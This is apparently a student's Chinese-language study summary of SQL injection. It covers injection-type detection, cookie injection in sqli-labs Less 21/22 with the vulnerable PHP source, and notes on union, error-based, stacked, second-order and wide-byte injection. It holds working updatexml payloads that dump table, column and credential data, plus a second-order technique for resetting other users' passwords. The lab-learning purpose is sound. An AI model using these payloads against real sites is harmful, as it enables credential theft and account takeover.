对sql进行一个小结
还有其他的注入
其他注入:堆叠注入,宽字节注入,二次注入
首先是数值和字符
id=1 and 1=1和id=1 and 1=2 如果这两个语句返回的页面不一样就说明是数字型
id=1' and 1=1#和id=1' and 1=2# 如果这两个语句返回的页面不一样就说明是字符型
常见的字符组合
1' 1" 1') 1") 1)
id=1%' and 1=1#和id=1%' and 1=2# 如果这两个页面返回的结果不一样就说明是搜索型
GET注入:使用get请求提交数据,比如 xxx.php?id=1.
POST注入:使用post请求提交数据,比如表单,包含在数据报文里。
Cookie注入:使用Cookie的某个字段提交数据,比如在Cookie中保存用户信息。
HTTP Header注入:使用请求头提交数据,比如检测HTTP中的源地址、主机IP等
get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单方式,get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。
cookie注入就要稍微繁琐一些了,要进行cookie注入,我们首先就要修改cookie,这里就需要使用到Javascript语言了。
条件
1.程序对get和post方式提交的数据进行了过滤,但未对cookie提交的数据库进行过滤
2.还需要程序对提交数据获取方式是直接request("xxx")的方式,未指明使用request对象的具体方法进行获取,也就是说用request这个方法的时候获取的参数可以是是在URL后面的参数,也可以是cookie里面的参数,之后的原理就像我们的sql注入一样了。
cookie注入的原理在于更改本地的cookie,从而利用cookie来提交非法语句
设置cookie值,打开相关网址后,清空地址栏输入以下语句,就能设置cookie字段为id,值为284,设置完后,重新打开新网址,新网址是以设置的cookie值重新访问网站的。
javascript:alert(document.cookie="id="+escape("284"))
document.cookie:表示当前浏览器中的cookie变量
alert():表示弹出一个对话框,在该对话框中单击“确定”按钮确认信息。
escape():该函数用于对字符串进行编码
less21
看看源码
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '';
setcookie('uname', base64_encode($row1['username']), time()+3600);
echo "I LOVE YOU COOKIES";
echo "";
echo '';
//echo 'Your Cookie is: ' .$cookee;
echo "";
echo "
";
print_r(mysql_error());
echo "
";
echo '';
echo "
";
header ('Location: index.php');
}
else
{
echo '';
//echo "Try again looser";
print_r(mysql_error());
echo "";
echo "";
echo '';
echo "";
}
}
提交的uname和passwd进行了严格的检验,
检验函数如下
//检验函数
function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,20); // truncation (see comments)
}
if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
{
$value = stripslashes($value);
}
if (!ctype_digit($value)) // Quote if not a number
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
根据这条语句可以在cookie处进行注入
但是要注意base64编码
setcookie('uname', base64_encode($row1['username']), time()+3600);
进入到数据库查询的时候,会对cookie的值进行解码,语句如下
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
将cookie字段替换为payload
Dumb') and updatexml(1,concat(0x7e,database(),0x7e),1)#(此处经过base64编码,如果结果有等号还要进行url编码)
测试之后就会发现是字符型的注入,单引号加上右括号
以下的语句需要进行base64编码
爆security的表名:
Dumb') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&submit=Submit
爆users的列名:
Dumb') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&submit=Submit
爆数据:
Dumb') and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),1,31),0x7e),1)#&submit=Submit
Dumb') and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),32,31),0x7e),1)&submit=Submit
第22关
只是闭合方式不一样,采用的是双引号的
显注:前端页面可以回显用户信息,比如 联合注入、报错注入。
盲注:前端页面不能回显用户信息,比如 布尔盲注、时间注入
联合注入
1、寻找注入点
2、判断闭合方式
3、判断列数
order by
4、联合查询,查看回显位置
union select 1,2,3,4
5、查看数据库名、版本等相关信息
6、得到所有数据库名
7、得到指定数据的所有列表
8、得到指定表的列名
9、得到想要的数据
常见的闭合方式
数字类型(无闭合)
单引号 ’
双引号 ”
括号 )
组合方式 ‘) ") ')) "))
注释符
--+ #
报错注入常用的函数
extractvalue() 使用XPath表示法从XML字符串中提取值
updatexml() 改变文档中符合XML片段的值
extractvalue(xml对象文档的内容,路径)
updatexml(xml对象文档的内容,路径,要修改的新内容)
一个是提取,一个是修改
报错符号
一般书写在路径位置为特殊符号,即可使得出现报错,
0x7e(~)
报错原理
路径出现特殊符号得时候,就会报错
然后利用concat把符号和sql命令语句拼接到一块,就可以执行报错注入
eg
extractvalue(1,0x7e);
堆叠注入形成原理
就是在执行sql语句的时候,运用的multi函数,此函数可以执行多条sql语句,攻击者闭合第一个参数,然后用;号可以执行输入的语句,因此造成堆叠注入
函数
mysql_multi_query
利用
先闭合前面的数据,用;进行闭合,然后再后面输入自己要执行的sql语句,随后注释后面的数据
二次注入
攻击者第一次输入的时候,后端代码对攻击者输入的参数进行了转义,但是在传入到数据库的时候的时候,没有进行转义,当攻击者再次读取到数据的时候,没有对数据库的字符进行转义,因此导致形成闭合
在注册当中,把用户名注册为和数据库人员一样的名字,在名字后面添加闭合字符,因此插入到数据库当中,再次修改用户密码的时候,就可以形成闭合,修改目标账户的密码
也可以在名字添加闭合字符后面增加or 1语句,再次执行的时候,就是修改全表中用户的密码
也就是先加上字符,然后再加上or 1
宽字节注入
当客户端发送到服务端的时候运用一种编码,服务端发送到数据库的时候又运用了一种编码,返回到客户端的时候运用了一种编码
这里就已经运用了三种编码
php后台的编码与数据库的编码不一致,或者经过一些编码函数(如iconv) 进行转换处理,导致可以使用宽字节,绕过转义字符,完成闭合,导致sql注入
编码格式
指Unicode编码,存储方式采用UTF-16。因为只有2字节和4字节两种情况,故用wchar_t,占两个字节。
当后台程序对于传入的数据的数据进行了转义时,需要运用到闭合的时候
上面只是一部分比较常见的,后面的还需要进一步去了解。